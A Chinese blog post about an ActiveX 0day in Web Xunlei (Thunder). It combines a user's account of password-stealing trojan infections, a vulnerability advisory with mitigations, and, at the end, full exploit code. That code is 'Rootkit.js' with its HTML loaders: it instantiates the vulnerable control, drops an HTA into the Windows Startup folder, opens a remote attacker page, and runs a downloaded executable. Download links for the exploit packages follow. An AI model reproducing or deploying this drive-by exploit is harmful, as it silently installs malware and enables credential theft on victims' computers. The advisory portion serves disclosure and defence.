黑客关注 Web迅雷 0day漏洞 发起新攻击
黑客关注 Web迅雷 0day漏洞 发起新攻击
来源:赛迪网 作者:李铁军
除操作系统外,用户群越广的软件,被攻击的可能性越大。最近不少恶意软件攻击者把目录投向迅雷,有关Web迅雷的0day在黑客圈广为流行,迅雷官方补丁,升级程充也发了若干个版本以修补这些安全隐患,但似乎效果不佳。
昨天下班,一兄弟的电脑上,毒霸发现一堆盗号木马,和毒霸论坛上反馈的情况类似。使用Sreng分析,发现一堆DLL文件插入正常程序的进程,hosts中禁止了一大堆安全软件的网站,各磁盘分区被写入autorun.inf和另一个随机8位字符的EXE。用毒霸清理专家的文件粉碎器和Sreng的日志分析,把这些SYS、DLL文件全部干掉,才没有继续下载onlinegame木马。
风险分析:这位兄弟的电脑涉及公司很多机密信息,平常非常注重安全管理,系统补丁,管理员口令,甚至权限都很严密,自动播放也被禁止。配置了毒霸自动杀毒和更新,发现病毒是极为罕见的事情,也会被认为是重大安全事件。风险来自哪里呢?
仔细分析后,发现与打开Web迅雷有关,这是已经升级到最新的Web迅雷版本。尝试重新打开Web迅雷,很快毒霸又报告发现木马。尽管,我尚无法分析出是有关Web迅雷的具体漏洞。已经感觉到这些病毒,是和Web迅雷的下载行为是相关的。
在分析最近发现的那些插入正常程序进程的DLL病毒时,我明显感觉到病毒的版本更新速度超过了杀毒病毒库的更新速度,病毒程序的在线升级速度,也快过杀毒软件的升级速度。(写到这儿,又会有粪青耻笑了——谁让你用毒霸),我要说的是,每次,我从论坛或客户那边拿到的这些样本,都会用各种杀毒软件检查一遍,目前,我没有发现任何一个产品能检查到全部样本。
在病毒作者的圈子中,交换程序代码相当普遍,怀疑他们用来对付杀毒软件的代码,也是共享的。而杀毒厂商之间,显然,还没有实现这一点。这就要我们更加关注服务,关注应急响应。我很高兴地看到毒霸在这方面进展迅速,珠海兄弟们很辛苦,谢谢他们!
Web迅雷0day漏洞被曝光
DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光,该漏洞发生在Web迅雷的一个控件上,当安装了Web迅雷的用户在浏览黑客精心构造的包含恶意代码的网页后,会下载任意程序在用户系统上以当前用户上下文权限运行。
Web迅雷1.7.3.109版之前的版本均受影响。
一、事件分析:
根据BCT组织分析,该漏洞产生细节如下:
WEB讯雷组件的名称:ThunderServer.webThunder.1,可以采用JS代码ActiveXObject("ThunderServer.webThunder.1");来激活讯雷的组件。其中的关键函数包括:
SetBrowserWindowData:新建浏览器窗口。
SetConfig:设置WEB讯雷。
HideBrowserWindow:隐藏浏览器。
AddTask:添加下载任务。
SearchTask:搜索任务,得到任务ID,文件下载状态等详情。
OpenFile:根据任务ID,打开文件。
攻击者利用这一系列的函数,已经能完成从下载到运行木马程序的完整过程,实现了一个完整的网页木马功能。
二、解决方案:
1、SetBrowserWindowData 函数验证URL参数是否为本地地址,或者为讯雷官方的地址,避免用户浏览除了本地到官方的URL地址,从而一定程度上防御外来恶意数据。
2、在漏洞曝光后,迅雷官方反应迅速,第一时间推出升级版,请将Web迅雷升级到最新版。
版本号:1.7.3.109
点击下载web迅雷 V1.7.2.107
3、推荐安装超级巡警防范恶意木马。
注:
该漏洞由 Bug.Center.Team 组织发现并公布。
漏洞发现者:Sobiny[BCT]
关于Web迅雷:
Web迅雷是迅雷公司最新推出的一款基于多资源超线程技术的下载工具,和迅雷5作为专业下载工具的定位不同, web迅雷在设计上更多的考虑了初级用户的使用需求,使用了全网页化的操作界面,更符合互联网用户的操作习惯,带给用户全新的互联网下载体验!
WEB迅雷存在漏洞,可构造成网页木马!
--------------------------------------------------------------//>Rootkit.Js
var Good_fan = null;
function shit()
{
try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76\x65\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}
catch(e){return;}
var vip;
vip="<script defer> var shell=\"<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject(\\\"wscript.shell\\\");shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://www.rootkit.com.cn/vips.htm\\\",0,0);function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";var sp=new ActiveXObject(\\\"shell.application\\\");var chenzi=sp.NameSpace(china);for(i=0;i<chenzi.Items().Count;i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\vip[1].exe\\\";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);runmm();<\\/script></body></html>\";var love = new ActiveXObject(\"ADODB.Recordset\");love.Fields.Append(\"love\", 200, 3000);love.Open();love.AddNew();love.Fields(\"love\").Value=shell;love.Update();love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\microsofts.hta\",0);love.Close();</script>";
var ret=Good_fan.AddCateogry(vip);
Good_fan.SetBrowserWindowSize(0,0,400,300);
var strps = Good_fan.GetServerPath();
strps = strps.substr(0, strps.length-1);
strps+="\\page\\index.htm";
Good_fan.SetBrowserWindowData(strps,"love");
Good_fan.HideBrowserWindow(1);
return;
}
-------------------------------------------------------//Rootkit.js 结束
----------------------------Rootkit.htm-------------------------------
<SCRIPT src="rootkit.js"></SCRIPT>
<BODY onload=shit();><BR><BR>
--------------------------Rootkit.Htm 结束--------------------------
----------------------Rootkits.htm-----------------------------------
<script src="rootkit.exe"></script>
---------------------rootkits.htm--------------------------------------
完整打包下载: 点击下载此文件
http://www.rootkit.com.cn/attach ... 6/a200762693015.rar
http://www.expl0its.cn/attachments/month_0706/l20076521230.rar
http://www.zyxunmeng.cn/attachments/month_0706/i200762694136.rar
没有评论:
发表评论